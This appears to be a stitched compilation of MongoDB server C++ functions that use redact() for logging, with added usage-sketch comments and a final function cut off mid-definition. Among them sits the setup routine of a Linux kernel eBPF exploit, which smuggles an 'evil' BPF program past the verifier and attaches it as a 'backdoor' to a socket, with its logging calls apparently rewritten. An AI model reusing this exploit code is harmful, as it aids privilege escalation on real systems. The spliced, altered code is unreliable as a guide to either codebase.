OpTimeWithHash BackgroundSync::_readLastAppliedOpTimeWithHash(OperationContext* opCtx) {
    BSONObj oplogEntry;
    try {
        bool success = writeConflictRetry(
            opCtx, "readLastAppliedHash", NamespaceString::kRsOplogNamespace.ns(), [&] {
                Lock::DBLock lk(opCtx, "local", MODE_X);
                return Helpers::getLast(
                    opCtx, NamespaceString::kRsOplogNamespace.ns().c_str(), oplogEntry);
            });

        if (!success) {
            // This can happen when we are to do an initial sync. lastHash will be set
            // after the initial sync is complete.
            return OpTimeWithHash(0);
        }
    } catch (const DBException& ex) {
        severe() << "Problem reading " << NamespaceString::kRsOplogNamespace.ns() << ": "
                 << redact(ex);
        fassertFailed(18904);
    }

    long long hash;
    auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash);
    if (!status.isOK()) {
        severe() << "Most recent entry in " << NamespaceString::kRsOplogNamespace.ns()
                 << " is missing or has invalid \"" << kHashFieldName
                 << "\" field. Oplog entry: " << redact(oplogEntry) << ": " << redact(status);
        fassertFailed(18902);
    }

    OplogEntry parsedEntry(oplogEntry);
    return OpTimeWithHash(hash, parsedEntry.getOpTime());
}
void ClusterAggregate::killAllCursors(const std::vector<Strategy::CommandResult>& shardResults) {
    // This function must ignore and log all errors. Callers expect a best-effort attempt at
    // cleanup without exceptions. If any cursors aren't cleaned up here, they will be cleaned
    // up automatically on the shard after 10 minutes anyway.
    for (size_t i = 0; i < shardResults.size(); i++) {
        try {
            BSONObj result = shardResults[i].result;
            if (!result["ok"].trueValue()) {
                continue;
            }

            const long long cursor = result["cursor"]["id"].Long();
            if (!cursor) {
                continue;
            }

            ScopedDbConnection conn(shardResults[i].target);
            conn->killCursor(cursor);
            conn.done();
        } catch (const DBException& e) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to DBException: " << redact(e);
        } catch (const std::exception& e) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to std::exception: " << redact(e.what());
        } catch (...) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to non-exception";
        }
    }
}
/**
 * Remaps the private view from the shared view so that it does not consume too much
 * copy-on-write/swap space. Must only be called after the in-memory journal has been flushed
 * to disk and applied on top of the shared view.
 *
 * @param fraction Value between (0, 1] indicating what fraction of the memory to remap.
 *      Remapping too much or too frequently incurs copy-on-write page fault cost.
 */
static void remapPrivateView(OperationContext* opCtx, double fraction) {
    // Remapping private views must occur after WRITETODATAFILES otherwise we wouldn't see any
    // newly written data on reads.
    invariant(!commitJob.hasWritten());

    try {
        Timer t;
        remapPrivateViewImpl(opCtx, fraction);
        stats.curr()->_remapPrivateViewMicros += t.micros();

        LOG(4) << "remapPrivateView end";
        return;
    } catch (DBException& e) {
        severe() << "dbexception in remapPrivateView causing immediate shutdown: " << redact(e);
    } catch (std::ios_base::failure& e) {
        severe() << "ios_base exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (std::bad_alloc& e) {
        severe() << "bad_alloc exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (std::exception& e) {
        severe() << "exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (...) {
        severe() << "unknown exception in remapPrivateView causing immediate shutdown";
    }

    invariant(false);
}
/**
 * Invoked at server startup. Recovers the database by replaying journal files and then
 * starts the durability thread.
 */
void startup(ClockSource* cs, int64_t serverStartMs) {
    if (!storageGlobalParams.dur) {
        return;
    }

    journalMakeDir(cs, serverStartMs);

    try {
        replayJournalFilesAtStartup();
    } catch (DBException& e) {
        severe() << "dbexception during recovery: " << redact(e);
        throw;
    } catch (std::exception& e) {
        severe() << "std::exception during recovery: " << redact(e.what());
        throw;
    } catch (...) {
        severe() << "exception during recovery";
        throw;
    }

    preallocateFiles();

    durableImpl.start(cs, serverStartMs);
    DurableInterface::_impl = &durableImpl;
}
void ShardingEgressMetadataHookForMongos::_saveGLEStats(const BSONObj& metadata,
                                                        StringData hostString) {
    if (!haveClient()) {
        // Client will be present only when write commands are used.
        return;
    }

    auto swShardingMetadata = rpc::ShardingMetadata::readFromMetadata(metadata);
    if (swShardingMetadata.getStatus() == ErrorCodes::NoSuchKey) {
        return;
    } else if (!swShardingMetadata.isOK()) {
        warning() << "Got invalid sharding metadata " << redact(swShardingMetadata.getStatus())
                  << " metadata object was '" << redact(metadata) << "'";
        return;
    }

    auto shardConn = ConnectionString::parse(hostString.toString());

    // If we got the reply from this host, we expect that its 'hostString' must be valid.
    if (!shardConn.isOK()) {
        severe() << "got bad host string in saveGLEStats: " << hostString;
    }
    invariantOK(shardConn.getStatus());

    auto shardingMetadata = std::move(swShardingMetadata.getValue());

    auto& clientInfo = cc();
    LOG(4) << "saveGLEStats lastOpTime:" << shardingMetadata.getLastOpTime()
           << " electionId:" << shardingMetadata.getLastElectionId();

    ClusterLastErrorInfo::get(clientInfo)
        ->addHostOpTime(
            shardConn.getValue(),
            HostOpTime(shardingMetadata.getLastOpTime(), shardingMetadata.getLastElectionId()));
}
void CollectionCloner::_finishCallback(const Status& status) {
    LOG(1) << "CollectionCloner ns:" << _destNss << " finished with status: " << redact(status);

    // Copy the status so we can change it below if needed.
    auto finalStatus = status;
    bool callCollectionLoader = false;
    UniqueLock lk(_mutex);
    callCollectionLoader = _collLoader.operator bool();
    lk.unlock();

    if (callCollectionLoader) {
        if (finalStatus.isOK()) {
            const auto loaderStatus = _collLoader->commit();
            if (!loaderStatus.isOK()) {
                warning() << "Failed to commit changes to collection " << _destNss.ns() << ": "
                          << redact(loaderStatus);
                finalStatus = loaderStatus;
            }
        }

        // This will release the resources held by the loader.
        _collLoader.reset();
    }

    _onCompletion(finalStatus);

    lk.lock();
    _stats.end = _executor->now();
    _progressMeter.finished();
    _active = false;
    _condition.notify_all();
    LOG(1) << " collection: " << _destNss << ", stats: " << _stats.toString();
}
long long BackgroundSync::_readLastAppliedHash(OperationContext* txn) {
    BSONObj oplogEntry;
    try {
        MONGO_WRITE_CONFLICT_RETRY_LOOP_BEGIN {
            ScopedTransaction transaction(txn, MODE_IX);
            Lock::DBLock lk(txn->lockState(), "local", MODE_X);
            bool success = Helpers::getLast(txn, rsOplogName.c_str(), oplogEntry);
            if (!success) {
                // This can happen when we are to do an initial sync. lastHash will be set
                // after the initial sync is complete.
                return 0;
            }
        }
        MONGO_WRITE_CONFLICT_RETRY_LOOP_END(txn, "readLastAppliedHash", rsOplogName);
    } catch (const DBException& ex) {
        severe() << "Problem reading " << rsOplogName << ": " << redact(ex);
        fassertFailed(18904);
    }

    long long hash;
    auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash);
    if (!status.isOK()) {
        severe() << "Most recent entry in " << rsOplogName << " is missing or has invalid \""
                 << kHashFieldName << "\" field. Oplog entry: " << redact(oplogEntry) << ": "
                 << redact(status);
        fassertFailed(18902);
    }

    return hash;
}
void onDbVersionMismatch(OperationContext* opCtx,
                         const StringData dbName,
                         const DatabaseVersion& clientDbVersion,
                         const boost::optional<DatabaseVersion>& serverDbVersion) noexcept {
    invariant(!opCtx->lockState()->isLocked());
    invariant(!opCtx->getClient()->isInDirectClient());

    auto const shardingState = ShardingState::get(opCtx);
    invariant(shardingState->canAcceptShardedCommands());

    if (serverDbVersion && serverDbVersion->getUuid() == clientDbVersion.getUuid() &&
        serverDbVersion->getLastMod() >= clientDbVersion.getLastMod()) {
        // The client was stale; do not trigger server-side refresh.
        return;
    }

    try {
        // TODO SERVER-33773 if the 'waitForMovePrimaryCriticalSection' flag is set on the
        // OperationShardingState, wait for the movePrimary critical section to complete before
        // attempting a refresh.
    } catch (const DBException& ex) {
        log() << "Failed to wait for movePrimary critical section to complete "
              << causedBy(redact(ex));
        return;
    }

    try {
        forceDatabaseRefresh(opCtx, dbName);
    } catch (const DBException& ex) {
        log() << "Failed to refresh databaseVersion for database " << dbName
              << causedBy(redact(ex));
    }
}
void initialize() {
    info("\n");
    info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
    info("\n");
    info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
    info("\n");

    redact("creating bpf map\n");
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if (mapfd < 0) {
        fail("failed to create bpf map: '%s'\n", strerror(errno));
    }

    redact("sneaking evil bpf past the verifier\n");
    progfd = load_prog();
    if (progfd < 0) {
        if (errno == EACCES) {
            msg("log:\n%s", bpf_log_buf);
        }
        fail("failed to load prog '%s'\n", strerror(errno));
    }

    redact("creating socketpair()\n");
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
        fail("failed to create socket pair '%s'\n", strerror(errno));
    }

    redact("attaching bpf backdoor to socket\n");
    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
        fail("setsockopt '%s'\n", strerror(errno));
    }
}
Status ShardingStateRecovery::recover(OperationContext* opCtx) {
    if (serverGlobalParams.clusterRole != ClusterRole::ShardServer) {
        return Status::OK();
    }

    BSONObj recoveryDocBSON;

    try {
        AutoGetCollection autoColl(opCtx, NamespaceString::kConfigCollectionNamespace, MODE_IS);
        if (!Helpers::findOne(
                opCtx, autoColl.getCollection(), RecoveryDocument::getQuery(), recoveryDocBSON)) {
            return Status::OK();
        }
    } catch (const DBException& ex) {
        return ex.toStatus();
    }

    const auto recoveryDocStatus = RecoveryDocument::fromBSON(recoveryDocBSON);
    if (!recoveryDocStatus.isOK())
        return recoveryDocStatus.getStatus();

    const auto recoveryDoc = std::move(recoveryDocStatus.getValue());

    log() << "Sharding state recovery process found document " << redact(recoveryDoc.toBSON());

    ShardingState* const shardingState = ShardingState::get(opCtx);
    invariant(shardingState->enabled());

    if (!recoveryDoc.getMinOpTimeUpdaters()) {
        // Treat the minOpTime as up-to-date.
        grid.advanceConfigOpTime(recoveryDoc.getMinOpTime());
        return Status::OK();
    }

    log() << "Sharding state recovery document indicates there were "
          << recoveryDoc.getMinOpTimeUpdaters()
          << " metadata change operations in flight. Contacting the config server primary in order "
             "to retrieve the most recent opTime.";

    // Need to fetch the latest opTime from the config server, so do a logging write.
    Status status =
        grid.catalogClient(opCtx)->logChange(opCtx,
                                             "Sharding minOpTime recovery",
                                             NamespaceString::kConfigCollectionNamespace.ns(),
                                             recoveryDocBSON,
                                             ShardingCatalogClient::kMajorityWriteConcern);
    if (!status.isOK())
        return status;

    log() << "Sharding state recovered. New config server opTime is " << grid.configOpTime();

    // Finally, clear the recovery document so next time we don't need to recover.
    status = modifyRecoveryDocument(opCtx, RecoveryDocument::Clear, kLocalWriteConcern);
    if (!status.isOK()) {
        warning() << "Failed to reset sharding state recovery document due to " << redact(status);
    }

    return Status::OK();
}
void AbstractIndexAccessMethod::getKeys(const BSONObj& obj,
                                        GetKeysMode mode,
                                        BSONObjSet* keys,
                                        BSONObjSet* multikeyMetadataKeys,
                                        MultikeyPaths* multikeyPaths) const {
    // TODO SERVER-36385: Remove ErrorCodes::KeyTooLong.
    static stdx::unordered_set<int> whiteList{ErrorCodes::CannotBuildIndexKeys,
                                              // Btree
                                              ErrorCodes::KeyTooLong,
                                              ErrorCodes::CannotIndexParallelArrays,
                                              // FTS
                                              16732,
                                              16733,
                                              16675,
                                              17261,
                                              17262,
                                              // Hash
                                              16766,
                                              // Haystack
                                              16775,
                                              16776,
                                              // 2dsphere geo
                                              16755,
                                              16756,
                                              // 2d geo
                                              16804,
                                              13067,
                                              13068,
                                              13026,
                                              13027};

    try {
        doGetKeys(obj, keys, multikeyMetadataKeys, multikeyPaths);
    } catch (const AssertionException& ex) {
        // Suppress all indexing errors when mode is kRelaxConstraints.
        if (mode == GetKeysMode::kEnforceConstraints) {
            throw;
        }

        keys->clear();
        if (multikeyPaths) {
            multikeyPaths->clear();
        }

        // Only suppress the errors in the whitelist.
        if (whiteList.find(ex.code()) == whiteList.end()) {
            throw;
        }

        // If the document applies to the filter (which means that it should have never been
        // indexed), do not suppress the error.
        const MatchExpression* filter = _btreeState->getFilterExpression();
        if (mode == GetKeysMode::kRelaxConstraintsUnfiltered && filter &&
            filter->matchesBSON(obj)) {
            throw;
        }

        LOG(1) << "Ignoring indexing error for idempotency reasons: " << redact(ex)
               << " when getting index keys of " << redact(obj);
    }
}
static void logCursorsWaiting(RangeDeleteEntry* entry) {
    // We always log the first cursors waiting message (so we have cursor ids in the logs).
    // After 15 minutes (the cursor timeout period), we start logging additional messages at
    // a 1 minute interval.
    static const auto kLogCursorsThreshold = Minutes{15};
    static const auto kLogCursorsInterval = Minutes{1};

    Date_t currentTime = jsTime();
    Milliseconds elapsedMillisSinceQueued{0};

    // We always log the first message when lastLoggedTS has not been set yet.
    if (entry->lastLoggedTS != Date_t()) {
        if (currentTime > entry->stats.queueStartTS)
            elapsedMillisSinceQueued = currentTime - entry->stats.queueStartTS;

        // Not logging, threshold not passed
        if (elapsedMillisSinceQueued < kLogCursorsThreshold)
            return;

        Milliseconds elapsedMillisSinceLog{0};
        if (currentTime > entry->lastLoggedTS)
            elapsedMillisSinceLog = currentTime - entry->lastLoggedTS;

        // Not logging, logged a short time ago
        if (elapsedMillisSinceLog < kLogCursorsInterval)
            return;
    }

    str::stream cursorList;
    for (std::set<CursorId>::const_iterator it = entry->cursorsToWait.begin();
         it != entry->cursorsToWait.end();
         ++it) {
        if (it != entry->cursorsToWait.begin())
            cursorList << ", ";
        cursorList << *it;
    }

    log() << "waiting for open cursors before removing range "
          << "[" << redact(entry->options.range.minKey) << ", "
          << redact(entry->options.range.maxKey) << ") "
          << "in " << entry->options.range.ns
          << (entry->lastLoggedTS == Date_t()
                  ? string("")
                  : string(str::stream() << ", elapsed secs: "
                                         << durationCount<Seconds>(elapsedMillisSinceQueued)))
          << ", cursor ids: [" << string(cursorList) << "]";

    entry->lastLoggedTS = currentTime;
}
MoveTimingHelper::~MoveTimingHelper() {
    // even if logChange doesn't throw, bson does
    // sigh
    try {
        if (_to.isValid()) {
            _b.append("to", _to.toString());
        }

        if (_from.isValid()) {
            _b.append("from", _from.toString());
        }

        if (_nextStep != _totalNumSteps) {
            _b.append("note", "aborted");
        } else {
            _b.append("note", "success");
        }

        if (!_cmdErrmsg->empty()) {
            _b.append("errmsg", *_cmdErrmsg);
        }

        grid.catalogClient(_txn)->logChange(_txn,
                                            str::stream() << "moveChunk." << _where,
                                            _ns,
                                            _b.obj(),
                                            ShardingCatalogClient::kMajorityWriteConcern);
    } catch (const std::exception& e) {
        warning() << "couldn't record timing for moveChunk '" << _where
                  << "': " << redact(e.what());
    }
}
StatusWith<DistLockManager::ScopedDistLock> MigrationManager::_getDistLock(
    OperationContext* txn, const Migration& migration) {
    const std::string whyMessage(str::stream()
                                 << "migrating chunk "
                                 << ChunkRange(migration.chunkInfo.migrateInfo.minKey,
                                               migration.chunkInfo.migrateInfo.maxKey)
                                        .toString()
                                 << " in "
                                 << migration.chunkInfo.migrateInfo.ns);

    StatusWith<DistLockManager::ScopedDistLock> distLockStatus =
        Grid::get(txn)->catalogClient(txn)->distLock(
            txn, migration.chunkInfo.migrateInfo.ns, whyMessage);

    if (!distLockStatus.isOK()) {
        const std::string msg = str::stream()
            << "Could not acquire collection lock for " << migration.chunkInfo.migrateInfo.ns
            << " to migrate chunk "
            << redact(ChunkRange(migration.chunkInfo.migrateInfo.minKey,
                                 migration.chunkInfo.migrateInfo.maxKey)
                          .toString())
            << " due to " << distLockStatus.getStatus().toString();
        warning() << msg;
        return {distLockStatus.getStatus().code(), msg};
    }

    return std::move(distLockStatus.getValue());
}
void BackgroundJob::jobBody() {
    const string threadName = name();
    if (!threadName.empty()) {
        setThreadName(threadName);
    }

    LOG(1) << "BackgroundJob starting: " << threadName;

    try {
        run();
    } catch (const std::exception& e) {
        error() << "backgroundjob " << threadName << " exception: " << redact(e.what());
        throw;
    }

    // We must cache this value so that we can use it after we leave the following scope.
    const bool selfDelete = _selfDelete;

    {
        // It is illegal to access any state owned by this BackgroundJob after leaving this
        // scope, with the exception of the call to 'delete this' below.
        stdx::unique_lock<stdx::mutex> l(_status->mutex);
        _status->state = Done;
        _status->done.notify_all();
    }

    if (selfDelete)
        delete this;
}
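// For context: jobBody() is the thread entry point that drives a subclass's run(). A minimal,
// hypothetical sketch of how such a job is typically defined and started follows. It assumes the
// BackgroundJob(bool selfDelete) constructor, the virtual name()/run() overrides, and the go()
// starter from MongoDB's background-job utility; treat those signatures, the CacheWarmerJob class,
// and warmCaches() as illustrative assumptions, not a verified reference.
class CacheWarmerJob : public BackgroundJob {
public:
    CacheWarmerJob() : BackgroundJob(true /* selfDelete */) {}

    std::string name() const override {
        return "CacheWarmer";  // becomes the thread name set in jobBody()
    }

    void run() override {
        // Any exception escaping here is logged by jobBody() and rethrown.
        warmCaches();  // hypothetical workload
    }
};

// Usage sketch: because selfDelete is true, the job deletes itself once jobBody() finishes.
// (new CacheWarmerJob())->go();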
void Database::clearTmpCollections(OperationContext* txn) {
    invariant(txn->lockState()->isDbLockedForMode(name(), MODE_X));

    list<string> collections;
    _dbEntry->getCollectionNamespaces(&collections);

    for (list<string>::iterator i = collections.begin(); i != collections.end(); ++i) {
        string ns = *i;
        invariant(NamespaceString::normal(ns));

        CollectionCatalogEntry* coll = _dbEntry->getCollectionCatalogEntry(ns);

        CollectionOptions options = coll->getCollectionOptions(txn);
        if (!options.temp)
            continue;
        try {
            WriteUnitOfWork wunit(txn);
            Status status = dropCollection(txn, ns);
            if (!status.isOK()) {
                warning() << "could not drop temp collection '" << ns << "': " << redact(status);
                continue;
            }
            wunit.commit();
        } catch (const WriteConflictException& exp) {
            warning() << "could not drop temp collection '" << ns << "' due to "
                         "WriteConflictException";
            txn->recoveryUnit()->abandonSnapshot();
        }
    }
}
std::string MoveChunkRequest::toString() const {
    std::stringstream ss;
    ss << "ns: " << getNss().ns() << ", " << redact(ChunkRange(getMinKey(), getMaxKey()).toString())
       << ", fromShard: " << getFromShardId() << ", toShard: " << getToShardId();

    return ss.str();
}
void WiredTigerRecoveryUnit::_abort() {
    try {
        bool notifyDone = !_prepareTimestamp.isNull();
        if (_session && _isActive()) {
            _txnClose(false);
        }
        _setState(State::kAborting);

        if (MONGO_FAIL_POINT(WTAlwaysNotifyPrepareConflictWaiters)) {
            notifyDone = true;
        }

        if (notifyDone) {
            _sessionCache->notifyPreparedUnitOfWorkHasCommittedOrAborted();
        }

        for (Changes::const_reverse_iterator it = _changes.rbegin(), end = _changes.rend();
             it != end;
             ++it) {
            Change* change = it->get();
            LOG(2) << "CUSTOM ROLLBACK " << redact(demangleName(typeid(*change)));
            change->rollback();
        }
        _changes.clear();
    } catch (...) {
        std::terminate();
    }

    _setState(State::kInactive);
}
Database::Database(OperationContext* txn, StringData name, DatabaseCatalogEntry* dbEntry)
    : _name(name.toString()),
      _dbEntry(dbEntry),
      _profileName(_name + ".system.profile"),
      _indexesName(_name + ".system.indexes"),
      _viewsName(_name + "." + DurableViewCatalog::viewsCollectionName().toString()),
      _durableViews(DurableViewCatalogImpl(this)),
      _views(&_durableViews) {
    Status status = validateDBName(_name);
    if (!status.isOK()) {
        warning() << "tried to open invalid db: " << _name;
        uasserted(10028, status.toString());
    }

    _profile = serverGlobalParams.defaultProfile;

    list<string> collections;
    _dbEntry->getCollectionNamespaces(&collections);

    for (list<string>::const_iterator it = collections.begin(); it != collections.end(); ++it) {
        const string ns = *it;
        _collections[ns] = _getOrCreateCollectionInstance(txn, ns);
    }

    // At construction time of the viewCatalog, the _collections map wasn't initialized yet, so no
    // system.views collection would be found. Now we're sufficiently initialized, signal a version
    // change. Also force a reload, so if there are problems with the catalog contents as might be
    // caused by incorrect mongod versions or similar, they are found right away.
    _views.invalidate();
    Status reloadStatus = _views.reloadIfNeeded(txn);
    if (!reloadStatus.isOK()) {
        warning() << "Unable to parse views: " << redact(reloadStatus)
                  << "; remove any invalid views from the " << _viewsName
                  << " collection to restore server functionality." << startupWarningsLog;
    }
}
void NetworkInterfaceASIO::_beginCommunication(AsyncOp* op) {
    // The way that we connect connections for the connection pool is by
    // starting the callback chain with connect(), but getting off at the first
    // _beginCommunication. I.e. all AsyncOp's start off with _inSetup == true
    // and arrive here as they're connected and authed. Once they hit here, we
    // return to the connection pool's get() callback with _inSetup == false,
    // so we can proceed with user operations after they return to this
    // codepath.
    if (op->_inSetup) {
        log() << "Successfully connected to " << op->request().target.toString();
        op->_inSetup = false;
        op->finish(RemoteCommandResponse());
        return;
    }

    LOG(3) << "Initiating asynchronous command: " << redact(op->request().toString());

    auto beginStatus = op->beginCommand(op->request());
    if (!beginStatus.isOK()) {
        return _completeOperation(op, beginStatus);
    }

    _asyncRunCommand(op, [this, op](std::error_code ec, size_t bytes) {
        _validateAndRun(op, ec, [this, op]() { _completedOpCallback(op); });
    });
}
void ShardingStateRecovery::endMetadataOp(OperationContext* opCtx) {
    Status status =
        modifyRecoveryDocument(opCtx, RecoveryDocument::Decrement, WriteConcernOptions());
    if (!status.isOK()) {
        warning() << "Failed to decrement minOpTimeUpdaters due to " << redact(status);
    }
}
void ShardingInitializationMongoD::updateShardIdentityConfigString(
    OperationContext* opCtx, const ConnectionString& newConnectionString) {
    BSONObj updateObj(
        ShardIdentityType::createConfigServerUpdateObject(newConnectionString.toString()));

    UpdateRequest updateReq(NamespaceString::kServerConfigurationNamespace);
    updateReq.setQuery(BSON("_id" << ShardIdentityType::IdName));
    updateReq.setUpdateModification(updateObj);

    try {
        AutoGetOrCreateDb autoDb(
            opCtx, NamespaceString::kServerConfigurationNamespace.db(), MODE_X);

        auto result = update(opCtx, autoDb.getDb(), updateReq);
        if (result.numMatched == 0) {
            warning() << "failed to update config string of shard identity document because "
                      << "it does not exist. This shard could have been removed from the cluster";
        } else {
            LOG(2) << "Updated config server connection string in shardIdentity document to "
                   << newConnectionString;
        }
    } catch (const DBException& exception) {
        auto status = exception.toStatus();
        if (!ErrorCodes::isNotMasterError(status.code())) {
            warning() << "Error encountered while trying to update config connection string to "
                      << newConnectionString.toString() << causedBy(redact(status));
        }
    }
}
Message OpMsgBuilder::finish() {
    if (kDebugBuild && !disableDupeFieldCheck_forTest.load()) {
        std::set<StringData> seenFields;
        for (auto elem : resumeBody().asTempObj()) {
            if (!(seenFields.insert(elem.fieldNameStringData()).second)) {
                severe() << "OP_MSG with duplicate field '" << elem.fieldNameStringData()
                         << "' : " << redact(resumeBody().asTempObj());
                fassert(40474, false);
            }
        }
    }

    invariant(_state == kBody);
    invariant(_bodyStart);
    invariant(!_openBuilder);
    _state = kDone;

    const auto size = _buf.len();
    MSGHEADER::View header(_buf.buf());
    header.setMessageLength(size);
    // header.setRequestMsgId(...);  // These are currently filled in by the networking layer.
    // header.setResponseToMsgId(...);
    header.setOpCode(dbMsg);
    return Message(_buf.release());
}
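// Rough usage note: finish() is the last step after the body (and any document sequences) have
// been written into the builder. The sketch below assumes OpMsgBuilder::setBody() and
// OpMsg::parse() as they appear elsewhere in the MongoDB source tree; treat the exact helper
// names and the ping command as assumptions rather than a verified reference.
OpMsgBuilder builder;
builder.setBody(BSON("ping" << 1 << "$db"
                            << "admin"));
Message request = builder.finish();  // fills in the header fields and releases the buffer

// The finished Message can then be handed to the transport layer, or parsed back for inspection:
// auto parsed = OpMsg::parse(request);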
void RSDataSync::_run() {
    Client::initThread("rsSync");
    AuthorizationSession::get(cc())->grantInternalAuthorization();

    // Overwrite prefetch index mode in BackgroundSync if ReplSettings has a mode set.
    auto&& replSettings = _replCoord->getSettings();
    if (replSettings.isPrefetchIndexModeSet())
        _replCoord->setIndexPrefetchConfig(replSettings.getPrefetchIndexMode());

    while (!_bgsync->inShutdown()) {
        // After a reconfig, we may not be in the replica set anymore, so
        // check that we are in the set (and not an arbiter) before
        // trying to sync with other replicas.
        // TODO(spencer): Use a condition variable to await loading a config
        if (_replCoord->getMemberState().startup()) {
            warning() << "did not receive a valid config yet";
            sleepsecs(1);
            continue;
        }

        const MemberState memberState = _replCoord->getMemberState();

        // TODO(siyuan) Control the behavior using applier state.
        // An arbiter can never transition to any other state, and doesn't replicate, ever
        if (memberState.arbiter()) {
            break;
        }

        // If we are removed then we don't belong to the set anymore
        if (memberState.removed()) {
            sleepsecs(5);
            continue;
        }

        try {
            if (_replCoord->getApplierState() == ReplicationCoordinator::ApplierState::Stopped) {
                sleepsecs(1);
                continue;
            }

            auto status = _replCoord->setFollowerMode(MemberState::RS_RECOVERING);
            if (!status.isOK()) {
                LOG(2) << "Failed to transition to RECOVERING to start data replication"
                       << causedBy(status);
                continue;
            }

            // Once we call into SyncTail::oplogApplication we never return, so this code only runs
            // at startup. It is not valid to transition from PRIMARY to RECOVERING ever, or from
            // SECONDARY to RECOVERING without holding a global X lock, so we invariant to make
            // sure this never happens.
            invariant(!memberState.primary() && !memberState.secondary());
            SyncTail(_bgsync, multiSyncApply).oplogApplication(_replCoord);
        } catch (...) {
            auto status = exceptionToStatus();
            severe() << "Exception thrown in RSDataSync: " << redact(status);
            std::terminate();
        }
    }
}
void CollectionCloner::_finishCallback(const Status& status) {
    log() << "CollectionCloner ns:" << _destNss
          << " finished cloning with status: " << redact(status);

    // Copy the status so we can change it below if needed.
    auto finalStatus = status;
    bool callCollectionLoader = false;

    decltype(_onCompletion) onCompletion;
    {
        LockGuard lk(_mutex);
        invariant(_state != State::kComplete);

        callCollectionLoader = _collLoader.operator bool();

        invariant(_onCompletion);
        std::swap(_onCompletion, onCompletion);
    }

    if (callCollectionLoader) {
        if (finalStatus.isOK()) {
            const auto loaderStatus = _collLoader->commit();
            if (!loaderStatus.isOK()) {
                warning() << "Failed to commit collection indexes " << _destNss.ns() << ": "
                          << redact(loaderStatus);
                finalStatus = loaderStatus;
            }
        }

        // This will release the resources held by the loader.
        _collLoader.reset();
    }

    onCompletion(finalStatus);

    // This will release the resources held by the callback function object. '_onCompletion' is
    // already cleared at this point and 'onCompletion' is the remaining reference to the callback
    // function (with any implicitly held resources). To avoid any issues with destruction logic
    // in the function object's resources accessing this CollectionCloner, we release this function
    // object outside the lock.
    onCompletion = {};

    LockGuard lk(_mutex);
    _stats.end = _executor->now();
    _progressMeter.finished();
    _state = State::kComplete;
    _condition.notify_all();
    LOG(1) << " collection: " << _destNss << ", stats: " << _stats.toString();
}
StatusWith<OplogApplier::Operations> OplogApplier::getNextApplierBatch(
    OperationContext* opCtx, const BatchLimits& batchLimits) {
    if (batchLimits.ops == 0) {
        return Status(ErrorCodes::InvalidOptions, "Batch size must be greater than 0.");
    }

    std::uint32_t totalBytes = 0;
    Operations ops;
    BSONObj op;
    while (_oplogBuffer->peek(opCtx, &op)) {
        auto entry = OplogEntry(op);

        // Check for oplog version change. If it is absent, its value is one.
        if (entry.getVersion() != OplogEntry::kOplogVersion) {
            std::string message = str::stream()
                << "expected oplog version " << OplogEntry::kOplogVersion << " but found version "
                << entry.getVersion() << " in oplog entry: " << redact(entry.toBSON());
            severe() << message;
            return {ErrorCodes::BadValue, message};
        }

        // Commands must be processed one at a time. The only exception to this is applyOps because
        // applyOps oplog entries are effectively containers for CRUD operations. Therefore, it is
        // safe to batch applyOps commands with CRUD operations when reading from the oplog buffer.
        if (entry.isCommand() && (entry.getCommandType() != OplogEntry::CommandType::kApplyOps ||
                                  entry.shouldPrepare())) {
            if (ops.empty()) {
                // Apply commands one-at-a-time.
                ops.push_back(std::move(entry));
                BSONObj opToPopAndDiscard;
                invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard));
                dassert(ops.back() == OplogEntry(opToPopAndDiscard));
            }

            // Otherwise, apply what we have so far and come back for the command.
            return std::move(ops);
        }

        // Apply replication batch limits.
        if (ops.size() >= batchLimits.ops) {
            return std::move(ops);
        }

        // Never return an empty batch if there are operations left.
        if ((totalBytes + entry.getRawObjSizeBytes() >= batchLimits.bytes) && (ops.size() > 0)) {
            return std::move(ops);
        }

        // Add op to buffer.
        totalBytes += entry.getRawObjSizeBytes();
        ops.push_back(std::move(entry));
        BSONObj opToPopAndDiscard;
        invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard));
        dassert(ops.back() == OplogEntry(opToPopAndDiscard));
    }

    return std::move(ops);
}
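// Rough usage sketch: draining the oplog buffer in batches. BatchLimits::ops and ::bytes come
// from the function above; the drain loop, the limit values, and the comment about the apply
// stage are illustrative assumptions rather than the actual applier loop.
OplogApplier::BatchLimits limits;
limits.ops = 5000;                 // cut a batch after this many operations
limits.bytes = 100 * 1024 * 1024;  // ...or once it reaches roughly 100 MB of raw oplog entries

while (true) {
    auto batch = uassertStatusOK(applier->getNextApplierBatch(opCtx, limits));
    if (batch.empty()) {
        break;  // buffer drained; a real applier would wait for more data instead of exiting
    }
    // Hand 'batch' to the application stage (e.g. multiApply) here.
}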
NOINLINE_DECL void uassertedWithLocation(int msgid,
                                         const char* msg,
                                         const char* file,
                                         unsigned line) {
    assertionCount.condrollover(++assertionCount.user);
    LOG(1) << "User Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line
           << endl;
    throw UserException(msgid, msg);
}
NOINLINE_DECL void msgassertedNoTraceWithLocation(int msgid,
                                                  const char* msg,
                                                  const char* file,
                                                  unsigned line) {
    assertionCount.condrollover(++assertionCount.warning);
    log() << "Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line
          << endl;
    throw MsgAssertionException(msgid, msg);
}
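// For context: these throwing helpers are normally reached through the assertion macros rather
// than called directly. The sketch below assumes the classic uassert(code, msg, cond) macro
// shape from MongoDB's assertion utilities, which captures __FILE__/__LINE__ and forwards to a
// *WithLocation helper when the condition is false; the error code, message, and condition are
// purely illustrative.
Status openOplog(bool oplogExists) {
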